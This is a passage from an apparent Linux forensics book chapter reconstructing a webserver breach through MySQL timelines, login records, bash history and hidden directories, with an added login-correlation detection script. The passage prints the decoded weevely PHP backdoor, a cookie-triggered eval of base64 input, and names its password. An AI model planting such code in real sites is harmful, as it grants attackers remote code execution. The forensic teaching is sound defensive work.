LEVERAGING MYSQL
The picture of what happened to the PAS webserver is starting to become pretty clear. Because it literally only takes a couple of minutes, the metadata is imported into MySQL using the techniques discussed in Chapter 6. Once everything is loaded in the database, a timeline from May 3 onward is easily created. The timeline shows intense webserver activity at approximately 22:50 on the 3rd of May. Further analysis reveals changes in the /usr/local/mysql/.weevely directory at 23:53 and the creation of a new file, /var/www/html/index3.php. A portion of the timeline is shown in Figure 9.21.
FIGURE 9.21
Portion of the PAS subject system timeline. The highlighted portion shows new files associated with backdoors.
The index3.php file is shown in Figure 9.22. This is some obfuscated code created by the weevely backdoor. This code both inserts extra characters and uses base64 encoding to hide what it does. $kh becomes “str_replace”, $hbh equals “base64_decode”, and $km is set to “create_function”. This makes the last line $go = create_function('', base64_decode(str_replace("q", "", $iy.$gn.$mom.$scv))); $go();. Parsing all of this through an online base64 decoder produces the following:
$c='count';$a=$_COOKIE;if(reset($a)=='ha' && $c($a)>3){ini_set('error_log', '/dev/null');$k='cked';echo
'<'.$k.'>';eval(base64_decode(preg_replace(array('/\w=\s/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}
FIGURE 9.22
Obfuscated PHP code from the weevely PHP SSH backdoor.
If you look closely enough, you will see the weevely password “hacked” is embedded in this code, which is also obfuscated.
Further analysis of the timeline reveals that Hydra was run a few times on the 4th of May. Some of the packet captures created by the webmaster, after a problem was suspected, were also analyzed. There seems to have been a test of the dropbear backdoor on port 44965 in this capture, but most traffic seems to be coming directly on port 22. Some of this traffic is shown in Figure 9.23.
FIGURE 9.23
Some of the traffic captured from the PAS subject system. The bottom four packets appear to be a test of the dropbear backdoor. The remaining packets in this capture are on the normal SSH port 22.
Partial results from running the query select * from logins order by start; are shown in Figure 9.24. The highlighted entries are around the time of the breach. A complete analysis of this information reveals that only John and Michael have been logging on to the system. This indicates that either John’s password has been compromised or that the attacker is not logging in directly. The other evidence gathered so far points to the latter.
FIGURE 9.24
Login information from the PAS subject system.
Running the query select * from login_fails order by start; against the failed logins paints a different picture. There is a long string of failed login attempts for John up until 23:07:54 on the 3rd of May. When combined with a successful remote login by John at 23:10:11 that day, it would appear that John’s account has been compromised. The failed logins are shown in Figure 9.25. At this stage it would appear that the initial compromise was the result of a webserver vulnerability. Once the attacker had his or her foot in the door, additional attacks were performed resulting in at least one compromised password.
FIGURE 9.25
Failed login attempts. The failed attempts happen repeatedly until 23:07:54. Consultation with the information from Figure 9.24 indicates that the password was compromised.
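The correlation the chapter draws by eye from Figures 9.24 and 9.25 (a run of failures for one account, then a success minutes later) can be made into a query. The following is an added example, not from the book; it uses an in-memory SQLite copy of the same idea (the book's tables live in MySQL), assumes a (who, start, ip) column layout for the logins and login_fails tables, and uses constructed rows rather than the PAS evidence.

```python
import sqlite3

# Constructed sample rows (not the PAS subject system's data); the
# (who, start, ip) schema is an assumption modelled on the book's tables.
LOGIN_FAILS = [
    ("michael", "2015-05-03 09:10:02", "198.51.100.7"),
    ("michael", "2015-05-03 09:10:40", "198.51.100.7"),
    ("john", "2015-05-03 23:05:10", "192.0.2.50"),
    ("john", "2015-05-03 23:05:31", "192.0.2.50"),
    ("john", "2015-05-03 23:06:02", "192.0.2.50"),
    ("john", "2015-05-03 23:06:48", "192.0.2.50"),
    ("john", "2015-05-03 23:07:20", "192.0.2.50"),
    ("john", "2015-05-03 23:07:54", "192.0.2.50"),
]
LOGINS = [
    ("john", "2015-05-03 08:02:15", "203.0.113.9"),      # ordinary morning login
    ("michael", "2015-05-03 09:14:00", "198.51.100.7"),  # two typos, then success
    ("john", "2015-05-03 23:10:11", "192.0.2.50"),       # success right after the burst
]

# For each successful login, count that account's failures in the preceding
# window; a long run that ends just before a success is the signal.
QUERY = """
SELECT s.who, COUNT(*) AS fails, MIN(f.start) AS first_fail,
       MAX(f.start) AS last_fail, s.start AS success, s.ip
FROM logins s JOIN login_fails f ON f.who = s.who
WHERE f.start < s.start AND f.start >= datetime(s.start, ?)
GROUP BY s.who, s.start, s.ip
HAVING COUNT(*) >= ?
ORDER BY s.start
"""

def load(conn, fails=LOGIN_FAILS, logins=LOGINS):
    conn.executescript("""
        CREATE TABLE login_fails (who TEXT, start TEXT, ip TEXT);
        CREATE TABLE logins (who TEXT, start TEXT, ip TEXT);
    """)
    conn.executemany("INSERT INTO login_fails VALUES (?,?,?)", fails)
    conn.executemany("INSERT INTO logins VALUES (?,?,?)", logins)

def suspicious_logins(window_minutes=30, min_fails=5):
    """Return (who, fails, first_fail, last_fail, success, ip) rows."""
    conn = sqlite3.connect(":memory:")
    load(conn)
    rows = conn.execute(QUERY, (f"-{window_minutes} minutes", min_fails)).fetchall()
    conn.close()
    return rows

if __name__ == "__main__":
    for row in suspicious_logins():
        print(row)
```

Michael's two mistyped passwords stay below the threshold, while John's six failures ending at 23:07:54 followed by the 23:10:11 success are flagged; the same query runs unchanged against MySQL apart from its date-arithmetic syntax.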
While the bash history from .bash_history files doesn’t have timestamps, unlike the history recovered by Volatility, it can still provide useful information. As shown in Figure 9.26, John’s account was used to download and install two additional rootkits that we have not yet discovered. The first one is a web shell called Poison that was installed on the webserver as index2.php. The second one is called RK.
FIGURE 9.26
Evidence of the installation of two additional rootkits.
A listing of PHP files in the document root and the start of the index2.php file are shown in Figure 9.27. The index2.php file claims to be the Poison Shell 1.0 by Doddy Hackman. Notice that the timestamp on index2.php is from 2013; unlike some of the other pieces of malware discovered so far, this one has had its timestamps altered.
FIGURE 9.27
Evidence that the Poison Shell 1.0 has been installed on the subject system.
We see a hidden directory called “.rk” that is used to store the RK rootkit. Because we have the subject’s filesystem mounted, we can use the command find
FIGURE 9.28
Hidden directories on the PAS subject system.